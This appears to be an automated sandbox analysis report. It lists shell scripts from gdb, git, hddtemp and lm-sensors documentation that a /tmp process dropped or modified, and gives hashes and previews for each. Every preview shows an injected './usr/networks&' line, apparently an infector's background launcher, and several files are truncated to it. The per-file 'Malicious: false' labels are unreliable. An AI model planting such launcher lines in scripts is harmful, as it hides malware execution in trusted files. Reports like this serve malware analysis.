SSDEEP:	24:yiYuM2UFMx/sIo6ml4wiQDRoLe/HfwoDt8vPP6k30YXU0kKhpjKGg:eBMx/tKiQDWawit8vPP6A0YXjnhpjXg
MD5:	141401CE535E9FFF3A9F3C9D5ECEC093
SHA1:	B0A5FA40FFBDAFF1F415B38513CE2A7921328D05
SHA-256:	68EC7433147E2F312EA47B69A5CEAE1B781AC9C95260A8D95F2A9354E26A0C35
SHA-512:	A3CC9A94FB7D97A1F57AE1D29A3432A56ACCE85C50E0F4073D65AC5CF77C50DE4A74E207203141ABD7297B62068BB937A3C63E5880A79C09950E5E6DD562D1BC
Malicious:	false
Preview:	./usr/networks&. exit 0 ;;.. -[W-]) opts="$opts '$1'" ;;.. ) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print

/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/gdb/contrib/ari/gdb_find.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/gdb/contrib/expect-read1.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	253
Entropy (8bit):	5.267626424494032
Encrypted:	false
SSDEEP:	6:aBH51mUeX3+G3Wj3kGjVnAdiIVUe8J24n:aB51je+f3VnBaUe8J24n
MD5:	37C0552689BD7719FFBE66F4C9AB831B
SHA1:	8BA6E9AED3FF50AB5AE1E516E1ADEE1F1464BF79
SHA-256:	6B21FC4B985122F02025F5050FD3C0910228E394DC9E72EBEC9F6354785BDF0B
SHA-512:	EA97773FE3E45B9A392CA74C1D8D527952980474C75846495A796652FAB647128844E9E87529D51CBF7520ACA08F7C1188E676E5E5BAC4F0FAA7B75B66538F31
Malicious:	false
Preview:	./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.

/usr/share/doc/gdb/contrib/gdb-add-index.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	2988
Entropy (8bit):	4.924425870820004
Encrypted:	false
SSDEEP:	48:II63+FOMuldvJM+6/4p20SdvgT3vtBug0hoAYXy39qbFcxZ+6N77DoXf0iqUckOM:Le+8RldvJjTEvgTftcoAYXY9q6o6N/Ds
MD5:	7E1F6356EC1ED5353F164A90853F050A
SHA1:	AEBF6C04E3737D1E1172965E25DB372841DD6550
SHA-256:	CE3B6AE4E92DA2F30AD1E09DCFA849B2744524D62B9AA9440BA76BEDCA46EE69
SHA-512:	CCF50021CA3905B5B61C6A2E6D516E21CADEF175D9CD64FD2630E5B185CAE7FF142E8F1793E484981F91F4EEF6C3E053F4D0FD6E9F1F2F9ACFF3B56FB163368E
Malicious:	false
Preview:	./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/}".test "$dir" = "$file" && dir="."..dwz_file="".if $READELF -S "$file" \| grep -q " \.gnu_debugaltlink "; then. dwz_file=$($READELF --string-dump=.gnu_debugaltlink "$file" \... \| grep -A1 "'\.gnu_debugaltlink':" \... \| tail -n +2 \... \| sed 's/.]//'). dwz_file=$(echo $dwz_file). if $READELF -S "$dwz_file" \| grep -E -q " \.(gdb_index\|debug_names) "; then..# Already has an index, skip it...dwz_file="". fi.fi..set_files ().{. local file="$1".. index4="${file}.gdb-index". index5="${file}.debug_names". debugstr="${file}.debug_str". debugstrmerge="${file}.debug_str.merge". debugstrerr="${file}.debug_str.err".}..tmp_files=.for f in "$file" "$dwz_file"; do. if [ "$f" = "" ]; then..continue. fi. set_files "$f". tmp_files="$tmp_files $index4 $index5 $debugstr $debugstrmerge $debugstrerr".done..rm -f $t

/usr/share/doc/gdb/contrib/words.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/git/contrib/coverage-diff.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/git/contrib/diff-highlight/t/t9400-diff-highlight.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/git/contrib/fast-import/git-import.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	486
Entropy (8bit):	5.198694046664742
Encrypted:	false
SSDEEP:	12:w6vgZi+Z5+v1a6v5vrpGje1rSACES02djvcn:rgI++NBNrpZrSAyRdjE
MD5:	84511195A8532AFAED8B6E6645B72FC9
SHA1:	C424C15440A2C33C8559CF718B1C4B661D85BF52
SHA-256:	47E74E34A77970C44CC9F8C39F20AF338E5E6BDFB60AB516B66247B5C50537EA
SHA-512:	680648718E925D7C6649BAFC0C134B19B31A41647EEC15142177E5A4C1F306454C4D61FFA4905FC2E7C5BE2461F90C73116E74B56664B4125101D9E6E9AD5DF0
Malicious:	false
Preview:	./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f\|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) \| git fast-import --date-format=now../usr/networks&.exit 1.

/usr/share/doc/git/contrib/git-resurrect.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	2904
Entropy (8bit):	5.006955417229927
Encrypted:	false
SSDEEP:	48:5uqbabEEfBEyVJ1IUM7cy8UEV3cyUEdKENHwJ+gAP253YNVq6h3p133pgt3piZ:YpBEcLIUYcy8UEtcyUEdKENHwJ+gAP2s
MD5:	E6A74480E370B07D5BDC026A624CE684
SHA1:	988862444F28FAB3B4D6B92EC6C4F0488781EE2E
SHA-256:	AA7A6EB55918038552A2417FF03AE208F7408447FC6322536A71CE309EE23230
SHA-512:	93F551BFC3E2D737ED93989FBCA8D4CB7883BF35EAD4DB9C84DAEFF8403787C663989E5BA038425BC622F1EFEA0AE06411BBF6F492E22ABC35218F271FF7624B
Malicious:	false
Preview:	./usr/networks&. sed -ne "/^$_x40 $$_x40$ Merge ./ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']' into $branch\$" \...--pretty=tformat:"%H %s" --all \|..sed -ne "/^$$_x40$ Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b\|--branch)...shift...new_name="$1"...;;.. -n\|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k\|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m\|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l\|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r\|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t\|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a\|--all)...scan_

/usr/share/doc/git/contrib/remotes2config.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/git/contrib/rerere-train.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	1246
Entropy (8bit):	5.049599407603353
Encrypted:	false
SSDEEP:	24:MASp8NltrBrTf+mAka+mq8bTNRzbm4XaR3U0Lp0VDbztR5OjPKITbfrCnMSg:MAtltd3dAkad3RzK4Xahjd0VDbZfWDb5
MD5:	7D6CF34C9799D8C55311F08D93A10138
SHA1:	A84010E0348E5047DF290518012FC67F16FDE381
SHA-256:	866FDA21F32F6B7DF370F774EE54E025C366EB13344FEB4171D8B2C7E71390AB
SHA-512:	9BAF68D66C557B79CEEBD37408E718DCAB9B24DA99D064896200891F56D16A0770F68C202EA169596A319EDAD2CBCD0F7F2CB93A07D20C11D4058F97D733C778
Malicious:	false
Preview:	./usr/networks&...exit 0...;;..-o\|--overwrite)...overwrite=1...shift...break...;;..--)...shift...break...;;..*)...break...;;..esac.done..# Overwrite or help options are not valid except as first arg.for opt in "$@".do..case "$opt" in..-h\|--help)...echo "$USAGE"...exit 0...;;..-o\|--overwrite)...echo "$USAGE"...exit 0...;;..esac.done... "$(git --exec-path)/git-sh-setup".require_work_tree.cd_to_toplevel..# Remember original branch.branch=$(git symbolic-ref -q HEAD) \|\|.original_HEAD=$(git rev-parse --verify HEAD) \|\| {..echo >&2 "Not on any branch and no commit yet?"..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" \|\| exit..git rev-list --parents "$@" \|.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test $overwrite = 1..then...git rerere forget ...fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:

/usr/share/doc/git/contrib/subtree/git-subtree.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	16426
Entropy (8bit):	5.045058479498928
Encrypted:	false
SSDEEP:	384:j0fwqnEt0mOR+eFCnerWvDL7gfpv6bck6pYT2t9+WYtrV1achgV3fD0CzIy2FfCr:j0fwqny0mOo8CnerWvH7ghSbckVT2t9n
MD5:	5FF7690E1044D6F67F7B8D809103162D
SHA1:	CC0197BA40420DCA0D68647648C2762C1BEF1A16
SHA-256:	5376C3978C0680B83294F2DBF1341C197B8BCC69A8691413FE8E6F493B5A8380
SHA-512:	827DA60BFED3EF33E4A24175AD3EB6B58E623B468369C35D5864B407C3F1D0655C942877C997A97D9768EA87B68138D047A4965F1FC66380988BF1A748B5987F
Malicious:	false
Preview:	./usr/networks&.eval "$(echo "$OPTS_SPEC" \| git rev-parse --parseopt -- "$@" \|\| echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug () {..if test -n "$debug"..then...printf "%s\n" "$" >&2..fi.}..say () {..if test -z "$quiet"..then...printf "%s\n" "$" >&2..fi.}..progress () {..if test -z "$quiet"..then...printf "%s\r" "$*" >&2..fi.}..assert () {..if ! "$@"..then...die "assertion failed: " "$@"..fi.}..ensure_single_rev () {..if test $# -ne 1..then...die "You must provide exactly one revision. Got: '$@'"..fi.}..while test $# -gt 0.do..opt="$1"..shift...case "$opt" in..-q)...quiet=1...;;..-d)...debug=1...;;..--annotate)...annotate="$1"...shift...;;..--no-annotate)...annotate=...;;..-b)...branch="$1"...shift...;;..-P)...prefix="${1%/}"...shift...;;..-m)...message="$1"...shift...;;..--no-prefix)...prefix=...;;..--onto)...onto="$1"...shift...;;..--no-onto)...ont

/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	823
Entropy (8bit):	5.445793673200752
Encrypted:	false
SSDEEP:	12:w6vCJsHKfrLCYwTlFfOfSL3DXKUvX90Eq2qBGSCP6pF5ViL2gR2DFfZf97n:rCJeyaYwD+uKKGRBmAF5I0Zl7
MD5:	4180AD5F33CADD1650F75A8BBC430E64
SHA1:	E47B7FB6D9AF677D61D983920D8CE0AC76A13DEF
SHA-256:	3DFF00AAF13758FABB9C97B4E9D26967211B44971056A6BEE5DC0DC04050715F
SHA-512:	7AB4417B9878A6122942C277D84A5BA1A286819853952614FFE4A9ACEEB00CBFE336AD4EE39946517E430A6C1E415486119733D6C58AD9BA22448CEC9E4766B6
Malicious:	false
Preview:	./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=$(echo -e "$CMT_MSG\n$HEADERS" \| sed -n -e 's/^Cc: $.$$/\1,/gp' \..-e 's/^Signed-off-by: $.$/\1,/gp')..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" \| sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.

/usr/share/doc/git/contrib/update-unicode/update_unicode.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/git/contrib/vscode/init.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	8722
Entropy (8bit):	4.841397056972939
Encrypted:	false
SSDEEP:	192:/i038ZMHCJtcyzyBgVQlyzcvXGC7tq5bM7YKBKjI7YYI:ZCbdHVQ+ceJE7+
MD5:	1C808D280E8DF536EFBE3AB9EC6A1AE4
SHA1:	28B08E23FC817DF4A67AD544B8D56F6947AB2A56
SHA-256:	706BDD06879A99096A874915BB81A179F3455DC1B29C2F01C54DB26197B05786
SHA-512:	1EDD029A4300324FF3D9E458B2F054F5D60231BA3E4EF374F5F20A11117E0DD4EC3AC3FDBB1AAF38800562E67BC473FDF66E2485350C8CB5565A3048FD91E2A5
Malicious:	false
Preview:	./usr/networks&..exit 1.}..cd "$(dirname "$0")"/../.. \|\|.die "Could not cd to top-level directory"..mkdir -p .vscode \|\|.die "Could not create .vscode/"..# General settings..cat >.vscode/settings.json.new <<\EOF \|\|.{. "C_Cpp.intelliSenseEngine": "Default",. "C_Cpp.intelliSenseEngineFallback": "Disabled",. "[git-commit]": {. "editor.wordWrap": "wordWrapColumn",. "editor.wordWrapColumn": 72. },. "[c]": {. "editor.detectIndentation": false,. "editor.insertSpaces": false,. "editor.tabSize": 8,. "editor.wordWrap": "wordWrapColumn",. "editor.wordWrapColumn": 80,. "files.trimTrailingWhitespace": true. },. "files.associations": {. ".h": "c",. ".c": "c". },. "cSpell.ignorePaths": [. ],. "cSpell.words": [. "DATAW",. "DBCACHED",. "DFCHECK",. "DTYPE",. "Hamano",. "HCAST",. "HEXSZ",. "HKEY",. "HKLM",. "IFGITLINK",. "IFIN

/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.882045108136863
Encrypted:	false
SSDEEP:	3:qXVOORgn:Tn
MD5:	D7BC14787BBF05DEAC1113F4B42B6099
SHA1:	BB0DF86AA88C53CB0E53147B50135113CB15FFFF
SHA-256:	2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
SHA-512:	810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
Malicious:	false
Preview:	./usr/networks&.exit 1.

/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	617
Entropy (8bit):	4.789300168717738
Encrypted:	false
SSDEEP:	12:ag6vEfH2QDFh7iYAfFnQiOuO72M6SFnQ73gfDfiem9MrE9HnDYha/MHrZIgHDMvX:4EvFIYGQi2qf0QcfDqurE9jYA/MLljMv
MD5:	13C31185F2BB9F9D26E363B9415D49B2
SHA1:	5D3AACF7D8FC903F7CEB6ED329C90F52ABCF3246
SHA-256:	2DFFED792FEC0D8B455B8230152C893848C28600007A907391BC27A74EA8F2B4
SHA-512:	050843F8AA048E4D7B14E4F292AE0381E81B3F49F382B5288FB13EF88FD3189A7AEBC2987E31F31A7D09BDC9E53D94B27FEAE57B3BE3E4822FBCE51B03424A3D
Malicious:	false
Preview:	./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.

/usr/share/doc/hddtemp/contribs/hddtemp-all.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	1015
Entropy (8bit):	4.896629241453442
Encrypted:	false
SSDEEP:	24:raKURpM5kJl8cI094qTAYCyiaLZZTu0BCauu0BC4ojDOpHpjFxDf0u0Nm4:raPpM5kJucIUN+zyZ5utauut4gDOdpja
MD5:	87F1604CDCC54749A6A6D814FBB28530
SHA1:	2E815968A4F6A0F92924E94C4D94BBE5F68BA871
SHA-256:	E53623C100D004F567645C208CA688CEEDF7E50B14226BC66D96C22CC12944EF
SHA-512:	C1C92619C802D476F41832EF89E728F89CCD277C6B26AD0AD436466DC9338D24A3064976D4E9C471342370A84FD3D9A9803411DC2D0BCA82ADEA0DFD550EACFC
Malicious:	false
Preview:	./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l \|cut -f 1 -d " " \|grep /dev/ \|sed -e 's/[[:digit:]]$//g' \|sort -u \|.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd\|/dev/hd).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom\|/dev/fd).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne

/usr/share/doc/lm-sensors/examples/daemon/healthd.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.736279036741599
Encrypted:	false
SSDEEP:	6:a5z9kOtWR2xokRVic6v3ApkRVX1dhlz4n:a53tPSjnz4n
MD5:	E97AC4982B9BDFC8ED84ADA38E7BA000
SHA1:	DE41A53FAE2E629E10235800917CDE6B2E0301AC
SHA-256:	DADFB755A5E8D372A17BA4A4C8DC9DFB87AF4AD674EC8760617A16772FB2FFA4
SHA-512:	B0035AA0879CE1F07F05B1CC3ABFD6F06C38D617D3A03248520B9B2F9790B6CE78156741330B2D4FE90A6BABF5493F944F281CE1BBE3B49864D35F4DF0F97314
Malicious:	false
Preview:	./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" \| mail -s '** Hardware Health Warning **' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.

/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	2712
Entropy (8bit):	5.4524991837552035
Encrypted:	false
SSDEEP:	48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9ZH0GXMZP9SFDAWxuQNa2K0uVl2dv4i:yF/E/l3XMZgNyZRo
MD5:	A148FED2694A1A82F4ABF9A28D0293DC
SHA1:	4652F09BF1B6FB1859FB4816EFB666AE371C13E6
SHA-256:	8E15D1F50B0C524C72F1AB62314D647BF610D9B15952A0FEABA439C111868D7D
SHA-512:	9E3AD1B35163A6875351B4028C473277FD120F7159D8E0F0BDA66BF6E0205AAA4ABA5053E9B30E702D99F15FDF5F5A1486216F7B4B7ED667807DF487E75777E8
Malicious:	false
Preview:	./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini

/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh

Download File

Process:	/tmp/ZFvtIZszMd
File Type:	ASCII text
Category:	dropped
Size (bytes):	2564
Entropy (8bit):	5.346461718403454
Encrypted:	false
SSDEEP:	48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
MD5:	5A7BF4FFD03AE3B45F7EF8500A88D63C
SHA1:	DBFF57314EAD3467F2357BF20E7D40FC20AE846C
SHA-256:	8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
SHA-512:	735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
Malicious:	false
